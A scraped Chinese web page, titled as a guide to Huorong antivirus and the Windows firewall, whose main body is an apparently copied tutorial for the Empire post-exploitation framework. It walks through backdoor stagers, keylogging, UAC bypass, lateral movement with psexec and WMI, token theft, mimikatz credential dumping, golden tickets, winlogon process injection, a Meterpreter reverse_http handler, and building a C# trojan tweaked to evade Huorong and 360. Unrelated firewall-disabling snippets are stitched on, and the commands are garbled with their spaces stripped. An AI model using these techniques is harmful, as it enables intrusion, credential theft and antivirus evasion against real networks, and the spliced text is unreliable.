能否须要与自带防火墙并用 火绒能否有ARP防火墙 火绒与自带防火墙的搭配经常使用指南

Empire后浸透框架重要用于Windows内网浸透，该框架重要基于Powershell和Python，它提供了一个模块的架构，协助攻打者可以创立和口头各种攻打战略，允许包含域内浸透、宏钓鱼、内网横向、权限维持、后门生成等多个模块。

官方：

0x01下载装置

装置Empire由两种形式，区分是基于源码装置和apt包装置

源码装置

在Github中下载Empire

gitclone

 间接装置Empire会报错

./setup/install.sh

 须要装置以下Python库，当然在装置库时会遇到很多疑问，以下是遇到疑问后的处置方法

pipinstallpyOpenSSLpipinstalliptoolspipinstallnetifacespipinstallpydispatchpipinstallpydispatcherpipinstallzlib_wrapperpipinstallmacholibpipinstallxlrdpipinstallxlutilspipinstallpyminifierpipinstalldropboxpipinstallpefile

 importlib不可装置处置方法

apt-getinstallbuild-essentialpython3-devpython2-devlibssl-devswig

 M2Crypto不可装置处置方法

pipinstall~/Desktop/M2Crypto-0.38.0.tar.gz

 dispatch不可装置处置方法

pipinstall--upgradesetuptools

 CryPto.Cipher报错处置方法

pipuninstallcryptopipinstallpycrypto

 
  下载地址：


 装置实现后成功启动Empire


 APT包装置


 经常使用apt包装置Empire

aptinstallpowershell-empirepowershell-empire

 0x02基础经常使用


 设置监听器


 进入Empire输入help可检查协助文档


 输入listeners进入监听器设置，按tab智能补全（假设不分明均可经常使用该方法）


 设置http监听器

uselistenerhttpinfo#检查监听器信息

 在监听器模块中带有True属性的值必定填写，其余属性或者会存在自动值，经常使用set和unset可扭转设置，首先设置监听器名为test

setNametest

 设置监听自动是80端口，然而80端口理论是Web主机，修正端口为8080

setHost

 开启监听器


 删除监听器

backlistkilltest

 生成后门


 经常使用usestager选用后门模块

usestagerwindows/launcher_bat

 设置监听器和输入目录

setListenertestsetOutFile/tmp/lanuncher.bat#默逞强入/tmp目录execute

 在/tmp目录成功找到生成后门


 把输入的后门放入指标系统中口头，口头成功后收到照应


 优惠代理


 经常使用agents检查以后会话，经过interact进入会话

agentsinteract22FLR8SU

 假设感觉会话称号太过复杂，可重命名会话

renamewin7

 agents下可经常使用命令如下：


 命令口头


 检查系统信息


 查问agents命令

helpagentscmds

 口头终端命令

shellwhoami

 基本色能


 经常使用截图性能


 经常使用键盘记载

usemodulecollection/keyloggerexecute

 经常使用剪切版

usemodulecollection/clipboard_monitorexecute

 0x03经常出现模块


 主机扫描


 ARP扫描模块

sleep0#设置距离期间usemodulesituational_awareness/network/arpscansetRange192.168.0.1-192.168.0.100execute

 SMB扫描模块

usemodulesituational_awareness/network/smbscannersetUserNameadministratorsetPasswordmacexecute

 端口扫描模块

usemodulesituational_awareness/network/portscansetHosts192.168.0.1-100setPorts445execute

 信息搜集


 查找本地治理员主机

usemodulesituational_awareness/network/powerview/find_localadmin_accessexecute

 检查共享文件

usemodulesituational_awareness/network/powerview/share_finderexecute

 Windows本地信息搜集

usemodulesituational_awareness/host/winenumexecute

 权限优化


 以后权限并非治理员，须要提权操作


 经常使用UACbypass模块提权

usemoduleprivesc/bypassuacsetListenertestexecute

 经常使用powerup审核可提权项，找到后可应用环境向量提权

usemoduleprivesc/powerup/allcheckssetListenertestexecute

 经常使用方案义务启动提权

usemodulepersistence/elevated/schtasks*setListenertestexecute

 经过溢出破绽提权，比如烂土豆破绽

usemoduleprivesc/ms16-032或usemoduleprivesc/ms16-135setListenertestexecute

 成功提权至SYSTEM


 0x04域内浸透


 环境引见

DC:192.168.52.138T1:192.168.52.128192.168.0.100D1:192.168.52.141

 以后已取得域内个别用户mac和本地治理员权限


 信息搜集


 基础信息搜集，包含系统信息、用户信息、网络环境等

sysinfowhoamiinfo

 经常使用ARP扫描，成功找到192.168.52.0/24存在四台主机

usemodulesituational_awareness/network/arpscansetRange192.168.52.0/24execute

 查找本地治理员

usemodulesituation_awareness/network/powerview/find_localadmin_accessexecute

 检查以后用户能否为其余主机上的本地治理员

shelldir\\192.168.52.141\C$

 成功找到域控主机IP为192.168.52.138

usemodulesituation_awareness/network/powerview/get_domain_controllerexecute

 横向移动


 经常使用会话注入须要治理员权限，切换本地治理员后把以后会话注入到其余主机上

usemodulelateral_movement/invoke_psexecsetListenertestsetComputerNamestu1execute

 经常使用invoke_wmi模块相比invoke_psexec愈加隐蔽

usemodulelateral_movement/invoke_wmisetListenertestsetComputerNamestu1execute

 窃取token


 在新会话中检查进程发现域治理员进程


 选用指标PID号后窃取域治理员token

steal_token1740shelldir\\OWA\C$

 假设须要恢还原来的身份可经常使用以下命令


 凭证失掉


 应用mimikatz拿到治理员明码明文和哈希


 检查一切用户凭证如下：


 应用哈希传递可拿到域控访问权限


 黄金票据


 在域控下经常使用lsadump模块失掉域内一切用户哈希

usemodulecredentials/mimikatz/lsadumpcreds

 成功拿到krbtgt用户哈希


 应用golden_ticket制造黄金票据

usemodulecredentials/mimikatz/golden_ticketsetcredid10setuseradministratorexecute

 0x05会话治理


 会话生成


 经常使用spawn模块生成新会话

usemodulemanagement/spawnsetListenertestexecute

 进程注入


 检查进程并选用需注入的进程ID


 成功注入winlogon进程

psinjecttest1120

 注入这类系统进程不会产生蓝屏


 MSF会话联动


 首先在MSF中设置http监听

useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_httpsetlhost192.168.0.50setlport4444exploit-j

 在Empire中设置反弹，其中payload须要与上对应

usemodulecode_execution/invoke_shellcodesetLhost192.168.0.50setLport4444setPayloadreverse_httpexecute

 经测试未遭到反弹shell，查阅资料后发现Empire转到MSF存在局限性，详细可检查

 0x06Empire-Web


 下载装置


 Empire存在web版本，把PHP和Empire联合的形式经过网页启动访问


 
  下载地址：


 下载empire-web

gitclone

 装置PHP裁减，需依据本机的PHP版本启动修正

apt-getinstallphp7.4-curl

 重启Apache后启用裁减

/etc/init.d/apache2restart

 基础经常使用


 设置绑定端口和登录账号明码

./empire--rest--restport1337--usernameadmin--password3mpir3admin

 访问站点输入账号明码admin/3mpir3admin


 成功登录能够可视化各个模块


 检查Agents模块


 检查已失掉的用户凭证


 检查文件系统


 0x07免杀模块


 生成csharp木马


 预备VisualStido用于编译C#文件


 
  下载地址：


 生成C#类型木马

usestagerwindows/csharp_exesetListenertestinfoexecute

 成功生成后门文件launcher.src


 csharp编译免杀


 经常使用VisualStdio关上cmd.sln


 须要装置.net2.0环境，关上程序与性能中的减少或删除程序装置net3.5版本，假设不可装置，关上组战略》系统〉指定可选组件装置和组件修复的设置


 
  .net允许：


 修正命名空间为mac123并减少花指令

vara="12345678";varb="67890123";

 实现后编译生成程序言件


 免杀成果


 经常使用火绒成功免杀


 经常使用360成功免杀


 然而口头后360会对行为查杀，上线则不受影响


 成功进入新会话当中

interactXWVH8ME2


 火绒安全软件关闭防火墙教程


 第一步，打开电脑，点击电脑软件火绒安全，如图所示请点击输入图片描述 第二步，打开火绒安全之后，点击右上角的主菜单，如图所示请点击输入图片描述 第三步，点击主菜单之后，在出现的列表中点击软件设置，如图所示请；2在打开的网络和共享中心界面的左下角就可以找到“Windows防火墙”设置选项，点击进入3打开Windows防火墙设置后，就可以进行“启用或关闭Windows防火墙”“还原默认”“高级设置”等操作，如果要关闭防火墙，则点击进入；1打开360安全卫士页面左边木马防火墙，开启关闭都是在那里！2点击开始菜单，打开控制面板选项在控制面板中找到windows防火墙选项，单击打开在弹出来的界面中如果你发现有如下图中显示的那样，说明你的防火墙是关闭着；4双击打开防火墙以后，在弹出对话框中将启动类型设置成禁用即可关闭防火墙iknowtarget=quot_blankquottitle=quot点击查看大图quotclass=quotikqb_img_alinkquotiknow；防火墙分2种1系统自带防火墙 2和你安装的防火墙 一的种关闭方法是右键 我的 电脑 点控制版面 选着 安全中心 选着防火墙 选着关闭 二的种关闭方法是关闭防火墙进程或者直接右下角防火墙图标点关闭，如果你不希望它在；_首先右键点击开始按钮，点击运行，输入“control”，点击确定然后点击Windows防火墙图标_单击启用或关闭Windows防火墙最后选择关闭Windows防火墙，点击确定即可关闭防火墙_通过以上几步设置，就可以成功关闭电脑自带的防火墙了；可以通过services的服务命令进行关闭，具体操作步骤如下工具原材料 win7电脑1打开电脑同时按“win+R”快捷键打开运行命令的窗口iknowtarget=quot_。
  
  一的种关闭方法是右键 我的 电脑 点控制版面 选着 安全中心 选着防火墙 选着关闭 二的种关闭方法是关闭防火墙进程或者直接右下角防火墙图标点关闭，如果你不希望它在电脑启动时候自动运行你可以在启动项里把它关闭开始；下面教你如何关闭防火墙，图文教程 介绍两种简单的关闭电脑防火墙的方法 一点击电脑左下角的 开始设置控制面板windows防火墙双击打开，选择关闭，点确定这样就关掉了防火墙 二这个方法就更简单；在页面中点击网络6关闭防火墙进入页面后，选择关闭防火墙。
  
  回答不知你用的是什么防火墙，以瑞星为例，打开设置，将启动方式改为手动另外点开始运行输入quotMSCONFIGquot选择quot启动quot将你的防火墙前面对勾去掉执行quotsetupquot命令启动文字模式配置实用程序，在quot选择一种工具quot中选择quot；1打开我的电脑左下角的“开始”菜单，然后找到“控制面板”2单击“控制面板”，进入到控制面板界面，在控制面板界面中找到“Windows防火墙”项3单击“Windows防火墙”，进入到Windows防火墙设置界面4在Windows防火墙，找到。
  
  1首先在Win10桌面找到“网络”图标，然后在其上鼠标右键，在弹出的右键菜单中，点击进入“属性”2在打开的网络和共享中心界面的左下角就可以找到“Windows防火墙”设置选项，点击进入3打开Windows防火墙设置后，就可；关闭电脑的防火墙和所有的杀毒软件和安全卫士的具体操作步骤如下1首先我们打开电脑桌面，用鼠标右键点击桌面左下角系统图标，找到控制面板选项并点击2进入控制面板之后，把右上角的查看方式调整为类别3然后我们就；同样需要重启电脑，Windows10防火墙就关闭了再次提醒，不建议关闭Windows防火墙，因为这是一个资源占用少而安全效果显著的安全防护，而且在安装了第三方防火墙后，Windows防火墙也会自动关闭，无需人工关闭。


 win11安全中心有火绒需要打开win11的防火墙吗


 需要，根据查询太平洋店电脑网显示。
  
  win11安全中心有火绒Win11关闭防火墙后系统将会失去防护功能，关闭后无法防止计算机病毒和蠕虫进入计算机，因此需要打开。


 如果安装了火绒还需要开启电脑自带的防火墙吗？


 不需要开启自带的防火墙了，并且自带的防火墙点进去，会提示无需操作，已经被火绒替换了。